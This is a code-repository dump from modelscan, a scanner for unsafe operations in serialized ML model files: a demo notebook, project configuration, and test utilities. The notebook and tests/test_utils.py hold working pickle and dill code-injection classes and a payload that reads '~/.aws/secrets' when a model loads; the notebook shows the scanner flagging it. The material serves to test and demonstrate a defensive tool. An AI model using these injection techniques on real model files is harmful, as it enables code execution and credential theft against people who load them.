seed = 7 12 | test_size = 0.33 13 | x_train, x_test, y_train, y_test = train_test_split( 14 | X, Y, test_size=test_size, random_state=seed 15 | ) 16 | 17 | return x_train, x_test, y_train, y_test 18 | 19 | 20 | def train_model(): 21 | x_train, _, y_train, _ = get_data() 22 | # fit model no training data 23 | model = XGBClassifier() 24 | model.fit(x_train, y_train) 25 | return model 26 | 27 | 28 | def get_predictions(number_of_predictions, model): 29 | _, x_test, _, y_test = get_data() 30 | 31 | ypred = [int(x) for x in model.predict(x_test[0:number_of_predictions])] 32 | print(f"The model predicts: {ypred}") 33 | print(f"The true labels are: {y_test[0:number_of_predictions]}") 34 | -------------------------------------------------------------------------------- /notebooks/xgboost_diabetes_classification.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "id": "bd852ab1", 6 | "metadata": {}, 7 | "source": [ 8 | "# Setup" 9 | ] 10 | }, 11 | { 12 | "cell_type": "code", 13 | "execution_count": 1, 14 | "id": "00052a84", 15 | "metadata": {}, 16 | "outputs": [ 17 | { 18 | "name": "stdout", 19 | "output_type": "stream", 20 | "text": [ 21 | "modelscan, version 0.5.0\n" 22 | ] 23 | } 24 | ], 25 | "source": [ 26 | "!pip install -q modelscan\n", 27 | "!modelscan -v" 28 | ] 29 | }, 30 | { 31 | "cell_type": "code", 32 | "execution_count": 2, 33 | "id": "eb656ce5", 34 | "metadata": {}, 35 | "outputs": [], 36 | "source": [ 37 | "!pip install -q xgboost==1.7.6\n", 38 | "!pip install -U -q scikit-learn==1.3.0" 39 | ] 40 | }, 41 | { 42 | "cell_type": "code", 43 | "execution_count": 3, 44 | "id": "06e8fc79", 45 | "metadata": {}, 46 | "outputs": [], 47 | "source": [ 48 | "import pickle\n", 49 | "from pathlib import Path\n", 50 | "import os\n", 51 | "import numpy as np\n", 52 | "from utils.pickle_codeinjection import generate_unsafe_file\n", 53 | "from utils.xgboost_diabetes_model import train_model, get_predictions" 54 | ] 55 | }, 56 | { 57 | "cell_type": "markdown", 58 | "id": "063dd649", 59 | "metadata": {}, 60 | "source": [ 61 | "# Save a XGBoost Model\n", 62 | "\n", 63 | "The model is trained on a diabetes dataset, and predicts whether a person has diabetes or not. The dataset can be found here: [Link to PIMA Indian diabetes dataset](https://www.kaggle.com/datasets/uciml/pima-indians-diabetes-database). The model is saved at ```./XGBoostModels/safe_model.pkl```" 64 | ] 65 | }, 66 | { 67 | "cell_type": "code", 68 | "execution_count": 4, 69 | "id": "015f415a", 70 | "metadata": {}, 71 | "outputs": [], 72 | "source": [ 73 | "model_directory = os.path.join(os.getcwd(), \"XGBoostModels\")\n", 74 | "if not os.path.isdir(model_directory):\n", 75 | " os.mkdir(model_directory)\n", 76 | "\n", 77 | "safe_model_path_pickle = os.path.join(model_directory, \"safe_model.pkl\")\n", 78 | "model = train_model()\n", 79 | "with open(safe_model_path_pickle, \"wb\") as fo:\n", 80 | " pickle.dump(model, fo)" 81 | ] 82 | }, 83 | { 84 | "cell_type": "markdown", 85 | "id": "51812303", 86 | "metadata": {}, 87 | "source": [ 88 | "# Predict using Safe Model" 89 | ] 90 | }, 91 | { 92 | "cell_type": "code", 93 | "execution_count": 5, 94 | "id": "8b8d0327", 95 | "metadata": {}, 96 | "outputs": [ 97 | { 98 | "name": "stdout", 99 | "output_type": "stream", 100 | "text": [ 101 | "The model predicts: [0, 1, 1]\n", 102 | "The true labels are: [0. 1. 1.]\n" 103 | ] 104 | } 105 | ], 106 | "source": [ 107 | "number_of_predictions = 3\n", 108 | "get_predictions(number_of_predictions, model)" 109 | ] 110 | }, 111 | { 112 | "cell_type": "markdown", 113 | "id": "fff6510d", 114 | "metadata": {}, 115 | "source": [ 116 | "# Scan the safe model\n", 117 | "\n", 118 | "The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no code injections in it, as expected." 119 | ] 120 | }, 121 | { 122 | "cell_type": "code", 123 | "execution_count": 6, 124 | "id": "ccfeee08", 125 | "metadata": {}, 126 | "outputs": [ 127 | { 128 | "name": "stdout", 129 | "output_type": "stream", 130 | "text": [ 131 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 132 | "\n", 133 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/safe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 134 | "\n", 135 | "\u001b[34m--- Summary ---\u001b[0m\n", 136 | "\n", 137 | "\u001b[32m No issues found! 🎉\u001b[0m\n" 138 | ] 139 | } 140 | ], 141 | "source": [ 142 | "!modelscan -p XGBoostModels/safe_model.pkl" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "id": "985410d3", 148 | "metadata": {}, 149 | "source": [ 150 | "# Model Serialization Attack\n", 151 | "\n", 152 | "Here code is injected in the safe model to read aws secret keys. The unsafe model is saved at ```./XGBoostModels/unsafe_model.pkl```" 153 | ] 154 | }, 155 | { 156 | "cell_type": "code", 157 | "execution_count": 7, 158 | "id": "d0e70069", 159 | "metadata": {}, 160 | "outputs": [], 161 | "source": [ 162 | "# Inject code with the command\n", 163 | "command = \"system\"\n", 164 | "malicious_code = \"\"\"cat ~/.aws/secrets\n", 165 | " \"\"\"" 166 | ] 167 | }, 168 | { 169 | "cell_type": "code", 170 | "execution_count": 8, 171 | "id": "7bde73cd", 172 | "metadata": {}, 173 | "outputs": [], 174 | "source": [ 175 | "with open(safe_model_path_pickle, \"rb\") as fo:\n", 176 | " safe_model_pickle = pickle.load(fo)\n", 177 | "\n", 178 | "unsafe_model_path = os.path.join(model_directory, \"unsafe_model.pkl\")\n", 179 | "generate_unsafe_file(model, command, malicious_code, unsafe_model_path)" 180 | ] 181 | }, 182 | { 183 | "cell_type": "markdown", 184 | "id": "1798152e", 185 | "metadata": {}, 186 | "source": [ 187 | "# Predict using Unsafe Model\n", 188 | "\n", 189 | "The malicious code gets executed when the model is loaded. The aws secret keys are displayed. \n", 190 | "\n", 191 | "Also, the unsafe model predicts just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. " 192 | ] 193 | }, 194 | { 195 | "cell_type": "code", 196 | "execution_count": 9, 197 | "id": "49d6c62f", 198 | "metadata": {}, 199 | "outputs": [ 200 | { 201 | "name": "stdout", 202 | "output_type": "stream", 203 | "text": [ 204 | "aws_access_key_id=\n", 205 | "aws_secret_access_key=\n", 206 | "The model predicts: [0, 1, 1]\n", 207 | "The true labels are: [0. 1. 1.]\n" 208 | ] 209 | } 210 | ], 211 | "source": [ 212 | "with open(unsafe_model_path, \"rb\") as fo:\n", 213 | " unsafe_model = pickle.load(fo)\n", 214 | "\n", 215 | "get_predictions(number_of_predictions, unsafe_model)" 216 | ] 217 | }, 218 | { 219 | "cell_type": "markdown", 220 | "id": "72584048", 221 | "metadata": {}, 222 | "source": [ 223 | "# Scan the Unsafe Model\n", 224 | "\n", 225 | "The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. \n", 226 | "\n", 227 | "modelscan also outlines the found operator(s) and module(s) deemed unsafe. " 228 | ] 229 | }, 230 | { 231 | "cell_type": "code", 232 | "execution_count": 10, 233 | "id": "9ee3393e", 234 | "metadata": {}, 235 | "outputs": [ 236 | { 237 | "name": "stdout", 238 | "output_type": "stream", 239 | "text": [ 240 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 241 | "\n", 242 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 243 | "\n", 244 | "\u001b[34m--- Summary ---\u001b[0m\n", 245 | "\n", 246 | "Total Issues: \u001b[1;36m1\u001b[0m\n", 247 | "\n", 248 | "Total Issues By Severity:\n", 249 | "\n", 250 | " - LOW: \u001b[1;32m0\u001b[0m\n", 251 | " - MEDIUM: \u001b[1;32m0\u001b[0m\n", 252 | " - HIGH: \u001b[1;32m0\u001b[0m\n", 253 | " - CRITICAL: \u001b[1;36m1\u001b[0m\n", 254 | "\n", 255 | "\u001b[34m--- Issues by Severity ---\u001b[0m\n", 256 | "\n", 257 | "\u001b[34m--- CRITICAL ---\u001b[0m\n", 258 | "\n", 259 | "Unsafe operator found:\n", 260 | " - Severity: CRITICAL\n", 261 | " - Description: Use of unsafe operator 'system' from module 'posix'\n", 262 | " - Source: /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\n" 263 | ] 264 | } 265 | ], 266 | "source": [ 267 | "!modelscan -p XGBoostModels/unsafe_model.pkl" 268 | ] 269 | }, 270 | { 271 | "cell_type": "markdown", 272 | "id": "9a908243", 273 | "metadata": {}, 274 | "source": [ 275 | "# Reporting Format\n", 276 | "ModelScan can report scan results in console (default), JSON, or custom report (to be defined by user in settings-file). For mode details, please see: ` modelscan -h` " 277 | ] 278 | }, 279 | { 280 | "cell_type": "markdown", 281 | "id": "7ff858af", 282 | "metadata": {}, 283 | "source": [ 284 | "## JSON Report\n", 285 | "\n", 286 | "For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` " 287 | ] 288 | }, 289 | { 290 | "cell_type": "code", 291 | "execution_count": 11, 292 | "id": "6df55b3e", 293 | "metadata": {}, 294 | "outputs": [ 295 | { 296 | "name": "stdout", 297 | "output_type": "stream", 298 | "text": [ 299 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 300 | "\n", 301 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 302 | "\u001b[1m{\u001b[0m\u001b[32m\"modelscan_version\"\u001b[0m: \u001b[32m\"0.5.0\"\u001b[0m, \u001b[32m\"timestamp\"\u001b[0m: \u001b[32m\"2024-01-25T17:56:00.855056\"\u001b[0m, \n", 303 | "\u001b[32m\"input_path\"\u001b[0m: \n", 304 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\u001b[0m\n", 305 | "\u001b[32m\"\u001b[0m, \u001b[32m\"total_issues\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"summary\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"LOW\"\u001b[0m: \u001b[1;36m0\u001b[0m, \n", 306 | "\u001b[32m\"MEDIUM\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"HIGH\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"CRITICAL\"\u001b[0m: \u001b[1;36m1\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"CRITICAL\"\u001b[0m: \n", 307 | "\u001b[1m[\u001b[0m\u001b[1m{\u001b[0m\u001b[32m\"description\"\u001b[0m: \u001b[32m\"Use of unsafe operator 'system' from module 'posix'\"\u001b[0m, \n", 308 | "\u001b[32m\"operator\"\u001b[0m: \u001b[32m\"system\"\u001b[0m, \u001b[32m\"module\"\u001b[0m: \u001b[32m\"posix\"\u001b[0m, \u001b[32m\"source\"\u001b[0m: \n", 309 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pkl\u001b[0m\n", 310 | "\u001b[32m\"\u001b[0m, \u001b[32m\"scanner\"\u001b[0m: \u001b[32m\"modelscan.scanners.PickleUnsafeOpScan\"\u001b[0m\u001b[1m}\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"errors\"\u001b[0m: \u001b[1m[\u001b[0m\u001b[1m]\u001b[0m, \n", 311 | "\u001b[32m\"scanned\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_scanned\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"scanned_files\"\u001b[0m: \n", 312 | "\u001b[1m[\u001b[0m\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/XGBoostModels/unsafe_model.pk\u001b[0m\n", 313 | "\u001b[32ml\"\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m\n" 314 | ] 315 | } 316 | ], 317 | "source": [ 318 | "# This will save the scan results in file: xgboost-model-scan-results.json\n", 319 | "!modelscan --path XGBoostModels/unsafe_model.pkl -r json -o xgboost-model-scan-results.json" 320 | ] 321 | } 322 | ], 323 | "metadata": { 324 | "kernelspec": { 325 | "display_name": "Python 3.10.13 ('py310')", 326 | "language": "python", 327 | "name": "python3" 328 | }, 329 | "language_info": { 330 | "codemirror_mode": { 331 | "name": "ipython", 332 | "version": 3 333 | }, 334 | "file_extension": ".py", 335 | "mimetype": "text/x-python", 336 | "name": "python", 337 | "nbconvert_exporter": "python", 338 | "pygments_lexer": "ipython3", 339 | "version": "3.10.13" 340 | }, 341 | "vscode": { 342 | "interpreter": { 343 | "hash": "bd638e2064d9001d4ca93bc8e56e039dad230900dd235e8a6196f1614960903a" 344 | } 345 | } 346 | }, 347 | "nbformat": 4, 348 | "nbformat_minor": 5 349 | } 350 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "modelscan" 3 | version = "0.0.0" 4 | description = "The modelscan package is a cli tool for detecting unsafe operations in model files across various model serialization formats." 5 | authors = ["ProtectAI "] 6 | license = "Apache License 2.0" 7 | readme = "README.md" 8 | packages = [{ include = "modelscan" }] 9 | exclude = ["tests/*", "Makefile"] 10 | 11 | [tool.poetry.scripts] 12 | modelscan = "modelscan.cli:main" 13 | 14 | [tool.poetry.dependencies] 15 | python = ">=3.9,<3.13" 16 | click = "^8.1.3" 17 | numpy = ">=1.24.3" 18 | rich = "^13.4.2" 19 | tomlkit = ">=0.12.3,<0.14.0" 20 | h5py = { version = "^3.9.0", optional = true } 21 | 22 | # TODO: Add py3.12 once TF release supports 23 | tensorflow = { version = "^2.17", optional = true } 24 | 25 | [tool.poetry.extras] 26 | tensorflow = ["tensorflow"] 27 | h5py = ["h5py"] 28 | 29 | [tool.poetry.group.test.dependencies] 30 | pytest = ">=7.4,<9.0" 31 | bandit = { version = "1.8.3", extras = ["toml"] } 32 | mypy = "^1.4.1" 33 | requests = "^2.31.0" 34 | aiohttp = "^3.8.5" 35 | dill = "^0.3.7" 36 | types-requests = ">1.26" 37 | torch = "^2.6.0" 38 | tf-keras = "^2.18.0" 39 | 40 | 41 | [tool.poetry.group.dev.dependencies] 42 | dunamai = "^1.18.0" 43 | pre-commit = ">=3.3.3,<5.0.0" 44 | black = ">=23.7,<26.0" 45 | 46 | [tool.poetry.group.prod.dependencies] 47 | dunamai = "^1.18.0" 48 | 49 | [build-system] 50 | requires = ["poetry-core", "poetry-dynamic-versioning"] 51 | build-backend = "poetry.core.masonry.api" 52 | 53 | [tool.poetry-dynamic-versioning] 54 | enable = true 55 | 56 | [tool.bandit] 57 | exclude_dirs = ["tests", "notebooks"] 58 | 59 | [tool.mypy] 60 | exclude = ["notebooks"] 61 | -------------------------------------------------------------------------------- /tests/data/password_protected.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/tests/data/password_protected.zip -------------------------------------------------------------------------------- /tests/data/unsafe_zip_pytorch.pt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/tests/data/unsafe_zip_pytorch.pt -------------------------------------------------------------------------------- /tests/test_utils.py: -------------------------------------------------------------------------------- 1 | import dill 2 | import os 3 | import pickle 4 | import struct 5 | from typing import Any, Tuple 6 | import torch 7 | import torch.nn as nn 8 | import tensorflow as tf 9 | import tf_keras as keras 10 | 11 | 12 | class MaliciousModule(keras.Model): # type: ignore 13 | def __init__(self, safe_model) -> None: # type: ignore 14 | super(MaliciousModule, self).__init__() 15 | self.model = safe_model 16 | 17 | @tf.function(input_signature=[tf.TensorSpec(shape=(32, 32), dtype=tf.float32)]) # type: ignore 18 | def call(self, x: float) -> Any: 19 | # Some model prediction logic 20 | res = self.model(x) 21 | 22 | # Write a file 23 | tf.io.write_file( 24 | "/tmp/aws_secret.txt", 25 | "aws_access_key_id=\naws_secret_access_key=", 26 | ) 27 | 28 | list_ds = tf.data.Dataset.list_files("/tmp/*.txt", shuffle=False) 29 | 30 | for file in list_ds: 31 | tf.print("File found: " + file) 32 | tf.print(tf.io.read_file(file)) 33 | 34 | return res 35 | 36 | 37 | class PickleInject: 38 | """Pickle injection""" 39 | 40 | def __init__(self, inj_objs: Any, first: bool = True): 41 | self.__name__ = "pickle_inject" 42 | self.inj_objs = inj_objs 43 | self.first = first 44 | 45 | class _Pickler(pickle._Pickler): 46 | """Reimplementation of Pickler with support for injection""" 47 | 48 | def __init__( 49 | self, file: Any, protocol: Any, inj_objs: Any, first: bool = True 50 | ) -> None: 51 | """ 52 | file: File object with write attribute 53 | protocol: Pickle protocol - Currently the default protocol is 4: https://docs.python.org/3/library/pickle.html 54 | inj_objs: _joblibInject object that has both the command, and the code to be injected 55 | first: Boolean object to determine if inj_objs should be serialized before the safe file or after the safe file. 56 | """ 57 | super().__init__(file, protocol) 58 | self.inj_objs = inj_objs 59 | self.first = first 60 | 61 | def dump(self, obj: Any) -> None: 62 | """Pickle data, inject object before or after""" 63 | if self.proto >= 2: # type: ignore[attr-defined] 64 | self.write(pickle.PROTO + struct.pack("= 4: # type: ignore[attr-defined] 66 | self.framer.start_framing() # type: ignore[attr-defined] 67 | 68 | # Inject the object(s) before the user-supplied data? 69 | if self.first: 70 | # Pickle injected objects 71 | for inj_obj in self.inj_objs: 72 | self.save(inj_obj) # type: ignore[attr-defined] 73 | 74 | # Pickle user-supplied data 75 | self.save(obj) # type: ignore[attr-defined] 76 | 77 | # Inject the object(s) after the user-supplied data? 78 | if not self.first: 79 | # Pickle injected objects 80 | for inj_obj in self.inj_objs: 81 | self.save(inj_obj) # type: ignore[attr-defined] 82 | 83 | self.write(pickle.STOP) # type: ignore[attr-defined] 84 | self.framer.end_framing() # type: ignore[attr-defined] 85 | 86 | def Pickler(self, file: Any, protocol: Any) -> _Pickler: 87 | # Initialise the pickler interface with the injected object 88 | return self._Pickler(file, protocol, self.inj_objs) 89 | 90 | class _PickleInject: 91 | """Base class for pickling injected commands""" 92 | 93 | def __init__(self, args: Any, command: Any = None) -> None: 94 | self.command = command 95 | self.args = args 96 | 97 | def __reduce__(self) -> Tuple[Any, Any]: 98 | """ 99 | In general, the __reduce__ function is used by pickle to serialize objects. 100 | If defined for an object, pickle would override its default __reduce__ function and serialize the object as outlined by the custom specified __reduce__ function, 101 | The object returned by __reduce__ here is a callable: (self.command), and the tuple: with first element (self.args) is the code to be executed by self.command. 102 | """ 103 | return self.command, (self.args,) 104 | 105 | class System(_PickleInject): 106 | """Create os.system command""" 107 | 108 | def __init__(self, args: Any) -> None: 109 | super().__init__(args, command=os.system) 110 | 111 | class Exec(_PickleInject): 112 | """Create exec command""" 113 | 114 | def __init__(self, args: Any) -> None: 115 | super().__init__(args, command=exec) 116 | 117 | class Eval(_PickleInject): 118 | """Create eval command""" 119 | 120 | def __init__(self, args: Any) -> None: 121 | super().__init__(args, command=eval) 122 | 123 | class RunPy(_PickleInject): 124 | """Create runpy command""" 125 | 126 | def __init__(self, args: Any) -> None: 127 | import runpy 128 | 129 | super().__init__(args, command=runpy._run_code) # type: ignore[attr-defined] 130 | 131 | def __reduce__(self) -> Tuple[Any, Any]: 132 | return self.command, (self.args, {}) 133 | 134 | 135 | def get_pickle_payload(command: str, malicious_code: str) -> Any: 136 | if command == "system": 137 | payload: Any = PickleInject.System(malicious_code) 138 | elif command == "exec": 139 | payload = PickleInject.Exec(malicious_code) 140 | elif command == "eval": 141 | payload = PickleInject.Eval(malicious_code) 142 | elif command == "runpy": 143 | payload = PickleInject.RunPy(malicious_code) 144 | return payload 145 | 146 | 147 | def generate_unsafe_pickle_file( 148 | safe_model: Any, command: str, malicious_code: str, unsafe_model_path: str 149 | ) -> None: 150 | payload = get_pickle_payload(command, malicious_code) 151 | pickle_protocol = 4 152 | file_for_unsafe_model = open(unsafe_model_path, "wb") 153 | mypickler = PickleInject._Pickler(file_for_unsafe_model, pickle_protocol, [payload]) 154 | mypickler.dump(safe_model) 155 | file_for_unsafe_model.close() 156 | 157 | 158 | class DillInject: 159 | """Code injection using Dill Pickler""" 160 | 161 | def __init__(self, inj_objs: Any, first: bool = True): 162 | self.__name__ = "dill_inject" 163 | self.inj_objs = inj_objs 164 | self.first = first 165 | 166 | class _Pickler(dill._dill.Pickler): # type: ignore[misc] 167 | """Reimplementation of Pickler with support for injection""" 168 | 169 | def __init__(self, file: Any, protocol: Any, inj_objs: Any, first: bool = True): 170 | super().__init__(file, protocol) 171 | self.inj_objs = inj_objs 172 | self.first = first 173 | 174 | def dump(self, obj: Any) -> None: 175 | """Pickle data, inject object before or after""" 176 | if self.proto >= 2: 177 | self.write(pickle.PROTO + struct.pack("= 4: 179 | self.framer.start_framing() 180 | 181 | # Inject the object(s) before the user-supplied data? 182 | if self.first: 183 | # Pickle injected objects 184 | for inj_obj in self.inj_objs: 185 | self.save(inj_obj) 186 | 187 | # Pickle user-supplied data 188 | self.save(obj) 189 | 190 | # Inject the object(s) after the user-supplied data? 191 | if not self.first: 192 | # Pickle injected objects 193 | for inj_obj in self.inj_objs: 194 | self.save(inj_obj) 195 | 196 | self.write(pickle.STOP) 197 | self.framer.end_framing() 198 | 199 | def DillPickler(self, file: Any, protocol: Any) -> _Pickler: 200 | # Initialise the pickler interface with the injected object 201 | return self._Pickler(file, protocol, self.inj_objs) 202 | 203 | class _DillInject: 204 | """Base class for pickling injected commands""" 205 | 206 | def __init__(self, args: Any, command: Any = None): 207 | self.command = command 208 | self.args = args 209 | 210 | def __reduce__(self) -> Tuple[Any, Any]: 211 | return self.command, (self.args,) 212 | 213 | class System(_DillInject): 214 | """Create os.system command""" 215 | 216 | def __init__(self, args: Any): 217 | super().__init__(args, command=os.system) 218 | 219 | class Exec(_DillInject): 220 | """Create exec command""" 221 | 222 | def __init__(self, args: Any): 223 | super().__init__(args, command=exec) 224 | 225 | class Eval(_DillInject): 226 | """Create eval command""" 227 | 228 | def __init__(self, args: Any): 229 | super().__init__(args, command=eval) 230 | 231 | class RunPy(_DillInject): 232 | """Create runpy command""" 233 | 234 | def __init__(self, args: Any): 235 | import runpy 236 | 237 | super().__init__(args, command=runpy._run_code) # type: ignore[attr-defined] 238 | 239 | def __reduce__(self) -> Any: 240 | return self.command, (self.args, {}) 241 | 242 | 243 | def get_dill_payload(command: str, malicious_code: str) -> Any: 244 | payload: Any 245 | if command == "system": 246 | payload = DillInject.System(malicious_code) 247 | elif command == "exec": 248 | payload = DillInject.Exec(malicious_code) 249 | elif command == "eval": 250 | payload = DillInject.Eval(malicious_code) 251 | elif command == "runpy": 252 | payload = DillInject.RunPy(malicious_code) 253 | return payload 254 | 255 | 256 | def generate_dill_unsafe_file( 257 | safe_model: Any, command: str, malicious_code: str, unsafe_model_path: str 258 | ) -> None: 259 | payload = get_dill_payload(command, malicious_code) 260 | pickle_protocol = 4 261 | file_for_unsafe_model = open(unsafe_model_path, "wb") 262 | mypickler = DillInject._Pickler(file_for_unsafe_model, pickle_protocol, [payload]) 263 | mypickler.dump(safe_model) 264 | file_for_unsafe_model.close() 265 | 266 | 267 | class PyTorchTestModel: 268 | def __init__(self) -> None: 269 | self.model = nn.Module() 270 | 271 | def generate_unsafe_pytorch_file( 272 | self, unsafe_file_path: str, model_path: str, zipfile: bool = True 273 | ) -> None: 274 | command = "system" 275 | malicious_code = """cat ~/.aws/secrets 276 | """ 277 | 278 | payload = get_pickle_payload(command, malicious_code) 279 | torch.save( 280 | torch.load(model_path), 281 | f=unsafe_file_path, 282 | pickle_module=PickleInject([payload]), 283 | _use_new_zipfile_serialization=zipfile, 284 | ) 285 | --------------------------------------------------------------------------------